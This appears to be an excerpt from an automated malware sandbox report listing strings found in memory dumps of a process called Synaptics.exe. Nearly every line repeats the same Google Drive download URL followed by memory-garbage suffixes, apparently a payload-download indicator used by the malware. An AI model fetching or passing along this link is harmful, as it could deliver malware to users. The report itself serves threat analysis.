                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3025147028.00000000120FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3042381549.000000001A93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3003398241.000000000C5EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2988162011.0000000005C4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3081251392.000000002687E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3036250486.00000000179BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3031680975.000000001593E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3038002483.00000000184FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3071063603.00000000233FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3070483536.000000002303E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2996848369.0000000008DAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3021363632.000000000FFAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3022825574.0000000010D6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2970251537.000000000480E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3043268796.000000001B0BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2997117875.000000000916E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3022555731.0000000010AEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3068493353.0000000021FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2995755111.0000000007EAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3084279941.000000002727E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#Om#
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#X
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#l
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$i
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$o
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%=
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3033049811.000000001647E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2055545858.0000000007C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3021046121.000000000FD2E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download($
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(m2-Q
                            Source: Synaptics.exe, 0000001D.00000002.3027077616.000000001313E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(p
                            Source: Synaptics.exe, 00000005.00000002.2039578728.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(p13
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                            Source: Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)$
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download))
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)ed
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)i
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-CH-
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-D
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-DrGB
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-fullt
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-meas
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..v
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download./
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.b
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.co.u
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.mooo
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.nT
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.orig
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.uk
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.xy#
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000918000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/1.1
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Driv
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/P
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/t
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download024
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0DZn
                            Source: Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0d
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0o:/7
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0t
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3038600325.00000000189FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download12
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download14
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1Zf
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1dl
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1m
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download22910
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2eq
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2i
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3P
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4c
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4i
